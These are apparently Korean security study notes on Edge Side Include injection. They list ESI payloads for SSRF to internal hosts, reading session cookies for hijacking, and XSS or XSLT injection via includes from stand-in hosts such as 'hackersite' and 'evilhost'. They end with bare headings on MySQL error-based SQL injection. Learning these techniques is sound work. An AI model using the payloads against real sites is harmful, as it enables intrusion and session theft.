스터디7

ESI injection

1. Edge Side Include Injection

html tag와 함께 웹 페이지를 구성 할 수 있는 markup language

https://www.w3.org/TR/esi-lang

ESI Language Specification 1.0

http://esi-examples.akamai.com/

Weather for <esi:include src="/weather/name?id=$(QUERY_STRING{city_id})" /> 

Monday:<esi:include src="/weather/week/monday?id=$(QUERY_STRING{city_i
d})"/> 

Tuesday:<esi:include src="/weather/week/tuesday?id=$(QUERY_STRING{city_I
d})" />

Edge Side Includes Injection – SSRF

 

<esi:include src=http://127.0.0.1/server-status/>

<esi:include src=http://internal_domain/server_base_csrf_page/>

 

-

Edge Side Includes Injection – Session Hijacking

 

<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> <esi:vars>$(HTTP_COOKIE{JSESSIONID})</esi:vars> <esi:vars>$(HTTP_COOKIE{Private_Cookie})</esi:vars>

 

 

Edge Side Includes Injection – XSS

 

<esi:include src=http://hackersite/xss.html/>

 

 

Edge Side Includes Injection – XML

 

<esi:include src="http://evilhost/poc.xml" dca="xslt" stylesheet="http://evilho

st/poc.xsl"/>

 

 

error based sql injection

mysql 5.5.5버전

 

수학적인 연산

1.MySQL Error Based SQL injection Using EXP

 

실습

2. BIGINT Overflow Error Based SQL Injection in MySQL

실습